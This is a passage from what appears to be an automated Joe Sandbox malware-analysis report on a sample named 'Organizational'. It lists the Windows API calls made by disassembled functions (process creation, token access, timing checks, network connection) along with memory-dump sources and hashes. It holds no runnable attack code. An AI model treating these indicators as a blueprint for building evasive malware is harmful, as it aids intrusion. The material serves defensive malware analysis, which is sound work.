                                                    • Instruction Fuzzy Hash: ED111336A0011DEBCB00EF98D895DFE77B8EB44301F95049AEA41E7250D730BA51DBA2
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EF214F
                                                    • GetStockObject.GDI32(00000011), ref: 00EF2163
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EF216D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CreateMessageObjectSendStockWindow
                                                    • String ID:
                                                    • API String ID: 3970641297-0
                                                    • Opcode ID: b8bdd81528f4b921417ab1a4b89fc218b6992fb07ef492b44cbb5b1ebaa33839
                                                    • Instruction ID: 28223ec38a040d8e273d4d23b82bc53d1f9ffb05efe50ac45158c435992e1ff5
                                                    • Opcode Fuzzy Hash: b8bdd81528f4b921417ab1a4b89fc218b6992fb07ef492b44cbb5b1ebaa33839
                                                    • Instruction Fuzzy Hash: DB115B7250264DBFDF124F909C84EFA7B69EF59364F451119FB0462150DB31DC60EBA4
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F504EC,?,00F5153F,?,00008000), ref: 00F5195E
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F504EC,?,00F5153F,?,00008000), ref: 00F51983
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F504EC,?,00F5153F,?,00008000), ref: 00F5198D
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00F504EC,?,00F5153F,?,00008000), ref: 00F519C0
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0
                                                    • Opcode ID: b4543c4b7a4c34d65210daeed380be72dc2e9eb4f7b2855ce54828b51e8abd63
                                                    • Instruction ID: 807ada23a58a2c0b4399b853872fbe226db275410e3609c138fd0eb7b2d2e1a9
                                                    • Opcode Fuzzy Hash: b4543c4b7a4c34d65210daeed380be72dc2e9eb4f7b2855ce54828b51e8abd63
                                                    • Instruction Fuzzy Hash: 3E115A32C0491CDBCF009FA4D998BEEBB78FF09752F414045EE80B2241CB30A698EB91
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F7E1EA
                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00F7E201
                                                    • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00F7E216
                                                    • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00F7E234
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                    • String ID:
                                                    • API String ID: 1352324309-0
                                                    • Opcode ID: 5d584156955b1008ebce58726aaa063887904428120148cf2d4e86c65a6e13ed
                                                    • Instruction ID: 872a2b01596614e0518005428361fbac67d84b8b4b86a29f9941570d3bb5458a
                                                    • Opcode Fuzzy Hash: 5d584156955b1008ebce58726aaa063887904428120148cf2d4e86c65a6e13ed
                                                    • Instruction Fuzzy Hash: 7F1152756453089BE7308F51DD08FA37BBCEB04B04F10859BA619D6451D7B0E508FB92
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction ID: 8fdb8a027a31561826b5d47114f7b61b24dbd493bd991f74e6c4d7f41c6866ae
                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction Fuzzy Hash: C9019E3244826EFBCF126E84EC02CEE3F22BB19350B588515FA1858171C33AC9B1BF81
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00F7B956
                                                    • ScreenToClient.USER32(?,?), ref: 00F7B96E
                                                    • ScreenToClient.USER32(?,?), ref: 00F7B992
                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F7B9AD
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    • Opcode ID: 862287d781f048ad220ef97fa68b803e0844e8090d35e5d389679dfc9fcdf9bb
                                                    • Instruction ID: b0cb96f4b3e5560eb6a832bcd1275ea1405a32e67791fd22f3ae39f23958a4d6
                                                    • Opcode Fuzzy Hash: 862287d781f048ad220ef97fa68b803e0844e8090d35e5d389679dfc9fcdf9bb
                                                    • Instruction Fuzzy Hash: FB1132B9D0020DEFDB41CF98C984AEEBBB9FF48210F508156E914E2610E735AA659F51
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F7BCB6
                                                    • _memset.LIBCMT ref: 00F7BCC5
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00FB8F20,00FB8F64), ref: 00F7BCF4
                                                    • CloseHandle.KERNEL32 ref: 00F7BD06
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseCreateHandleProcess
                                                    • String ID:
                                                    • API String ID: 3277943733-0
                                                    • Opcode ID: 305fb08954e0761ba5fc91d9216d0600920eaf372934d7a6482f849d94ac8300
                                                    • Instruction ID: eeeba6c37661e2ff000183468b09f6483b321f3f4b14190341a29491e5e4c8e0
                                                    • Opcode Fuzzy Hash: 305fb08954e0761ba5fc91d9216d0600920eaf372934d7a6482f849d94ac8300
                                                    • Instruction Fuzzy Hash: 47F05EB26403087FE3506B61AC45FFB3A5DEB49794F000521BA08D61A2DB758811FBA8
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?), ref: 00F571A1
                                                      • Part of subcall function 00F57C7F: _memset.LIBCMT ref: 00F57CB4
                                                    • _memmove.LIBCMT ref: 00F571C4
                                                    • _memset.LIBCMT ref: 00F571D1
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00F571E1
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                    • String ID:
                                                    • API String ID: 48991266-0
                                                    • Opcode ID: e9316145ed754eedcb837e4c8349bca6b2467ecad2c689c8706eee6dc277c035
                                                    • Instruction ID: 502a598f695687f436368c29c7b3d1a80100b684108c403274524b8895d22d4f
                                                    • Opcode Fuzzy Hash: e9316145ed754eedcb837e4c8349bca6b2467ecad2c689c8706eee6dc277c035
                                                    • Instruction Fuzzy Hash: 7AF0B43A200104ABCF406F54DC89A8ABB29EF49320F04C051FE085E21ACB35E855EBB4
                                                    APIs
                                                      • Part of subcall function 00EF16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00EF1729
                                                      • Part of subcall function 00EF16CF: SelectObject.GDI32(?,00000000), ref: 00EF1738
                                                      • Part of subcall function 00EF16CF: BeginPath.GDI32(?), ref: 00EF174F
                                                      • Part of subcall function 00EF16CF: SelectObject.GDI32(?,00000000), ref: 00EF1778
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F7C3E8
                                                    • LineTo.GDI32(00000000,?,?), ref: 00F7C3F5
                                                    • EndPath.GDI32(00000000), ref: 00F7C405
                                                    • StrokePath.GDI32(00000000), ref: 00F7C413
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 1539411459-0
                                                    • Opcode ID: d464dc3f30ed7d3f5102279cfa20f4e37ce51b9260153e144a73db19cd4740b3
                                                    • Instruction ID: 28ec9252b2bbb15a36f27f050ff2da4945857242db8a0bca023ade7370cc1165
                                                    • Opcode Fuzzy Hash: d464dc3f30ed7d3f5102279cfa20f4e37ce51b9260153e144a73db19cd4740b3
                                                    • Instruction Fuzzy Hash: FDF0BE3200521CBBDB126F50AC0DFEE3F59AF05721F448100FA11610E18B749554FFE9
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F4AA6F
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F4AA82
                                                    • GetCurrentThreadId.KERNEL32 ref: 00F4AA89
                                                    • AttachThreadInput.USER32(00000000), ref: 00F4AA90
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    • Opcode ID: 19142e3220974ebe7b1b1e5448a28755f4f48603cec50c11a30faa4e3fc51357
                                                    • Instruction ID: c09e3e4328ddb3b6259c32200ffc169cf4f04899f4edde11bc0bfe18ba70cc43
                                                    • Opcode Fuzzy Hash: 19142e3220974ebe7b1b1e5448a28755f4f48603cec50c11a30faa4e3fc51357
                                                    • Instruction Fuzzy Hash: F8E0393258122CBADB615FA29D0CEE77F1CEF117A1F408011F90984050DB75C554EBA0
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 00EF260D
                                                    • SetTextColor.GDI32(?,000000FF), ref: 00EF2617
                                                    • SetBkMode.GDI32(?,00000001), ref: 00EF262C
                                                    • GetStockObject.GDI32(00000005), ref: 00EF2634
                                                    • GetWindowDC.USER32(?,00000000), ref: 00F2C1C4
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F2C1D1
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00F2C1EA
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 00F2C203
                                                    • GetPixel.GDI32(00000000,?,?), ref: 00F2C223
                                                    • ReleaseDC.USER32(?,00000000), ref: 00F2C22E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                    • String ID:
                                                    • API String ID: 1946975507-0
                                                    • Opcode ID: bef7b00e5809205c63d9f8b4be0dded6edfa8cf55b57c9b8327abc67e6c75d0f
                                                    • Instruction ID: 4b7691cceea40482d010f8b6415dde780f43b7e633b4603e8552fc7004cb9617
                                                    • Opcode Fuzzy Hash: bef7b00e5809205c63d9f8b4be0dded6edfa8cf55b57c9b8327abc67e6c75d0f
                                                    • Instruction Fuzzy Hash: 2BE06D32504648BBEB615FA8BC4DBE83B11EB05332F448366FA69980E18B714994EB21
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00F49339
                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F48F04), ref: 00F49340
                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F48F04), ref: 00F4934D
                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F48F04), ref: 00F49354
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CurrentOpenProcessThreadToken
                                                    • String ID:
                                                    • API String ID: 3974789173-0
                                                    • Opcode ID: 9d8bfd355eea64da941dc9648b016177226b0a1c39252031b319e2830d7a877a
                                                    • Instruction ID: 34ec82d4fba50b863201584bf84f75edea0574c9826aa5ea5bae1c1fd25662d6
                                                    • Opcode Fuzzy Hash: 9d8bfd355eea64da941dc9648b016177226b0a1c39252031b319e2830d7a877a
                                                    • Instruction Fuzzy Hash: D4E08632B012159FE7A01FB15D0DBB73B6CEF517A1F114818B645C9090EA749448E750
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00F30679
                                                    • GetDC.USER32(00000000), ref: 00F30683
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F306A3
                                                    • ReleaseDC.USER32(?), ref: 00F306C4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 906c367d0ecc16cdac0fdae3fbb443ac3203128e13f0d37f6a3a380a99317cd9
                                                    • Instruction ID: 5bd18733ed63f011c8097a026b2aeafe25bf4395bd534efe0b8ca4558f2fa0dc
                                                    • Opcode Fuzzy Hash: 906c367d0ecc16cdac0fdae3fbb443ac3203128e13f0d37f6a3a380a99317cd9
                                                    • Instruction Fuzzy Hash: 6CE0E5B2800209EFCB819F60D808AAD7BF6AF88310F518005F95AA7250DB388555AF50
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00F3068D
                                                    • GetDC.USER32(00000000), ref: 00F30697
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F306A3
                                                    • ReleaseDC.USER32(?), ref: 00F306C4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: ea2e6c7e19ba4ce72ca83026e4640264f2f939d036099ae591321ccd471f6cec
                                                    • Instruction ID: 29f6d1d00a08f8d7b056aa6aab000a6a4bc4df68653c69386fa81016efca9dc7
                                                    • Opcode Fuzzy Hash: ea2e6c7e19ba4ce72ca83026e4640264f2f939d036099ae591321ccd471f6cec
                                                    • Instruction Fuzzy Hash: FAE01AB2800209AFCB819F60D808AAD7FF2AF8C310F508004FA59A7250DB389555AF50
                                                    APIs
                                                      • Part of subcall function 00F0436A: _wcscpy.LIBCMT ref: 00F0438D
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • __wcsnicmp.LIBCMT ref: 00F5B670
                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F5B739
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                    • String ID: LPT
                                                    • API String ID: 3222508074-1350329615
                                                    • Opcode ID: 81ae6013fb6f1aa85a9db1c0696537522ca9c0dfb0a1e07eaee50c52bb6b0f00
                                                    • Instruction ID: 1bd550e788bf04cace74685f505a448b315afe28b5415a649d81435a72b7892e
                                                    • Opcode Fuzzy Hash: 81ae6013fb6f1aa85a9db1c0696537522ca9c0dfb0a1e07eaee50c52bb6b0f00
                                                    • Instruction Fuzzy Hash: F4616176E00219AFCB14DF94D891EAEB7F4EF48310F108159FA06AB391DB70AE44DB50
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00EFE01E
                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00EFE037
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: 0961cb82c9c170fa85c026deabd97e3f0bb4f0f7d17639e8a3fc6f0b5b04f15b
                                                    • Instruction ID: 23377e799b731189ccf43eae52269f2fc2b048d79c1348851bf2857c9aefee63
                                                    • Opcode Fuzzy Hash: 0961cb82c9c170fa85c026deabd97e3f0bb4f0f7d17639e8a3fc6f0b5b04f15b
                                                    • Instruction Fuzzy Hash: FF5138B24087489BE320AF50EC86BBFBBF8FB84714F51885DF2D8511A1DB719529CB16
                                                    APIs
                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00F78186
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F7819B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '
                                                    • API String ID: 3850602802-1997036262
                                                    • Opcode ID: 5dc2cccc1c01a3bf34108f4ab04dbaa7ce6fd082703d82e1d26e6fb42067a845
                                                    • Instruction ID: b9f5d00a3d3339f083e547881a74bf936592f06a6273cbdaac117ae9eeff7984
                                                    • Opcode Fuzzy Hash: 5dc2cccc1c01a3bf34108f4ab04dbaa7ce6fd082703d82e1d26e6fb42067a845
                                                    • Instruction Fuzzy Hash: E3412874A403099FDB10DF64C885BEA7BB5FB08340F50416AE909AB391DB70A946DF91
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F62C6A
                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F62CA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
